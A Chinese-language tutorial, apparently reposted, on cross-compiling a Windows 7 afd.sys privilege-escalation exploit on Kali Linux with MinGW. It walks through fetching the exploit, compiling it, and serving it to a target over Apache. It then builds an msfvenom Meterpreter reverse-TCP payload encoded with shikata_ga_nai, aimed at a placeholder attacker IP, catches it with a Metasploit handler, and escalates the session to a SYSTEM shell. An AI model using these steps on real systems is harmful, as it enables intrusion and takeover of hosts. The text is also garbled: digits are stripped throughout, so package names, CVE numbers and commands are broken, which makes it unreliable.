位置: 编程技术 - 正文
推荐整理分享在Kali Linux上编译Windows漏洞的方法(kali linux 视频教程),希望有所帮助,仅作参考,欢迎阅读内容。
文章相关热门搜索词:kali linux使用方法,kali-linux,kali linux指令合集,kali linux的各种玩法,kali linux使用教程,kali-linux-all,kali linux使用教程,kali linux使用方法,内容如对您有帮助,希望把文章链接给更多的朋友!
如何在Kali Linux上编译Windows漏洞!
Mingw-w是一个用于创建Windows应用程序的自由和开源软件开发环境。 Mingw-w最初叫Mingw,它当时不支持位架构。在本教程中,我们将讨论如何使用Mingw-在 Kali Linux上编译Windows漏洞。 让我们开始在Kali Linux上安装Mingw-w。
Mingw-w是一个用于创建Windows应用程序的自由和开源软件开发环境。 Mingw-w最初叫Mingw,它当时不支持位架构。
在本教程中,我们将讨论如何使用Mingw-在 Kali Linux上编译Windows漏洞。 让我们开始在Kali Linux上安装Mingw-w。
1、在Kali Linux上安装Mingw-w
默认情况下,Kali Linux .2和更低版本上未安装Mingw-w。 因此,我们需要先安装它,然后才能在Linux上编译Windows漏洞。 执行以下命令,安装Mingw-w:
apt-get update apt-get install mingw-w
使用apt-get install mingw-w在您的Kali主机上安装mingw-w。
键入y为yes,以确认并继续Mingw-w安装过程。 下载和安装Mingw-w可能需要一段时间才能完成。
2、无法找到程序包mingw-w的解决方法
有时,你尝试安装mingw-w包时得到一个无法找到包mingw-w的错误,并得到类似如下提示:
root@kali:~# apt-getinstall mingw-w Reading package lists…Done Building dependency tree Reading stateinformation… Done E: Unable to locatepackage mingw-w
要解决这个问题,请确保在sources.list文件中具有正确的存储库。您可以使用nano编辑文件:
/etc/apt/sources.list
确保您在此文件中具有正确的存储库。 您可以在以下页面上找到不同版本的Kali Linux的存储库:
update,然后再次运行Mingw-w软件包的安装命令。
3、用Mingw-w交叉编译Windows漏洞利用
现在我们已经安装了Mingw-w,可以开始编译Windows漏洞利用程序了。 对于本教程,我们将编译一个用C编写的Windows漏洞利用程序,以利用Windows 7 SP0 x中的CVE--(MS-)漏洞。 此版本的Windows操作系统在辅助功能驱动程序(AFD)中包含一个漏洞,允许已认证的非管理用户提升权限。即使Mingw-w是为非常需要的位支持开发的,我们也可以编译位Windows漏洞。 让我们来看看如何编译位Windows漏洞。
让我们从Exploit-db下载漏洞:
wget --output-document= .c 位的afd.sys exploit:
i-w-mingw-gcc[input file: source]–o [output file: .exe]-lws2_
以下命令将编译Windows 7 afd.sys特权升级漏洞:
i-w-mingw-gcc .c –o exploit.exe –lws2_
编译Windows漏洞。
要将漏洞利用程序转移到目标主机,我们将使用内置的ApacheWeb服务器来提供它。 最后2个命令会将exploit复制到Apache主目录并启动Apache Web服务器。
当我们从cmd.exe下载并执行该漏洞时,它将如下所示:
漏洞利用成功执行。
因为我们可以看到whoami命令在执行exploit之前返回一个普通用户权限,之后显示是system用户权限。这个exploit实际上在当前shell中生成一个新的shell,而不是在新窗口中创建一个新的shell。这意味着我们也可以从命令行shell运行此漏洞利用程序,例如Meterpreter。让我们看看如何从Meterpreter会话运行漏洞利用。
4、利用编译错误
当编译针对不同架构和操作系统的漏洞时,可能会发生许多错误。有很多因素可能导致编译失败,例如:语法,库,主机和目标体系结构,用于编译代码的已安装软件等等。一些错误可能很容易修复,有些错误则不是。同样重要的是不同的警告来自致命的错误,因为警告可能只是指示一些类似的过时的功能,不能阻止漏洞的工作。致命错误会阻止漏洞利用,因此需要修复。
处理编译错误的最佳方法是仔细阅读,然后在Google上搜索解决方案。通常你不是第一个也不是唯一面对某个编译错误的人,因此没有必要重新发明轮子。在线资源(如堆栈交换)通常为您提供最常见的编译错误的可能解决方案。
5、从Meterpreter shell中利用MS-
让我们使用Msfvenom快速生成Windows 位Meterpreter反向TCP有效负载,并在目标主机上执行它。 我们将在Metasploit中使用多处理程序来捕获反向shell。
使用以下命令使用Msfvenom创建有效负载:
msfvenom -a x –platform Windows -p windows/meterpreter/reverse_tcpLHOST=[IP attackbox] LPORT= -e x/shikata_ga_nai –f exe –o exploit.exe
请务必更换侦听主机IP,必要时更换侦听端口。现在启动msfconsole并运行以下命令来设置多处理器漏洞:
use exploit/multi/handler set lhost [listening host IP] set lport run
在端口上启动反向TCP处理程序。
然后下载利用程序到目标主机并执行它。 如果一切设置正确,您应该在msfconsole上收到一个反向Meterpreter shell:
目标主机连接回Kali。
在Meterpreter命令行上运行下一“shell”命令并运行特权升级漏洞利用程序将shell升级到系统shell:
特权升级攻击通过我们的Meterpreter会话成功执行。
正如你可以看到的,shell从特权测试用户shell变化到系统shell。 请注意,在执行它的shell中生成一个新的系统shell。 因此,我们不能看到利用输出,因为它是在有限的特权的旧shell。
您可以通过键入Exit来验证这一点,将退出系统shell并返回到仍包含Windows 7权限升级exploit输出的用户shell:
特权用户shell上的exploit输出。
学到的东西
在本教程中,我们已经了解了在Linux上针对Windows的交叉编译漏洞的基础知识。 我们已经学习了如何在Kali Linux上安装Mingw-w并解决最常见的安装问题。 为了练习漏洞编译过程,我们编译了一个针对Windows7 x的特权提升漏洞。 这也称为交叉编译。
我们已成功的在目标主机上执行已编译的可执行文件,并将shell从有限的用户shell升级到系统shell。 我们已经知道,这个特殊的exploit在shell中生成了一个shell,在这个shell中执行了exploit。 这样,我们还可以从命令行(例如Meterpreter shell)执行特权提升漏洞利用。
最后但同样重要的是,我们已经了解了如何在编译过程中修复错误。
容器内存占用之系统cache介绍 缘起:监控(dockerstats)显示容器内存被用完了,进入容器瞅了瞅,没有发现使用内存多的进程,使用awk等工具把容器所有进程使用的内存加起来看看,
如何安装MeeGo和Windows 7双系统? 第一步:准备一个大于2G的U盘,因为meego系统大约1G,大一点比较好。第二步:整理磁盘腾出新的空间来安装meego系统。在windows下我的电脑,右击管理-磁
中兴新支点操作系统全面支持龙芯3A 附新特性 作为中国芯的代表,龙芯处理器这几年不断取得突飞猛进,规格性能大大提高,已经达到芯国际先进水平。更可喜的是,生态支持也日趋完善,操作系
标签: kali linux 视频教程
本文链接地址:https://www.jiuchutong.com/biancheng/354055.html 转载请保留说明!友情链接: 武汉网站建设